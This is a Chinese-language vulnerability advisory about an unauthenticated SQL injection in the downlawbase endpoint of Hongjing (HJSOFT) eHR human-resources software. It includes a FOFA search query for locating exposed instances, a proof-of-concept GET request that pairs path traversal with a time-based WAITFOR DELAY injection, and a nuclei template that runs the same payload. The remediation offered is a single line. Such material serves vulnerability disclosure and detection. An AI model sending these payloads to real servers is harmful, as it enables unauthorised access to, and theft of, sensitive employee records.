1.漏洞介绍
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。面向复杂单组织或多组织客户,支持流程,B/S架构。特别适合集团化管理和跨地域使用的产品,融合了最新的互联网技术和先进的人力资源管理理念和实践,更好地支持异地办公和网上流程,加强了人力资源业务的集中管理和协同,支持集团管控、目标管理、领导决策等应用。HJ-eHR主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用
宏景eHR downlawbase 接口处存在,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:app=“HJSOFT-HCM”
5.POC
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5
nuclei检测
id: hongjing-hcm-downlawbase-sql
info:
name: 宏景ehr-hcm-downlawbase-sql注入
author: test
severity: critical
description: |
宏景EHR人力资源管理系统downlawbase接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
impact: |
攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: app="HJSOFT-HCM" || body="宏景" || body="/general/sys/hjaxmanage.js"
tags: hongjing-HCM,sql
requests:
- raw:
- |
@timeout:10s
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=11';waitfor+delay+'0:0:5'--+ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
matchers:
- type: dsl
condition: and
dsl:
- "duration>=5"
- status_code==200
6.修复建议
更新到最新版本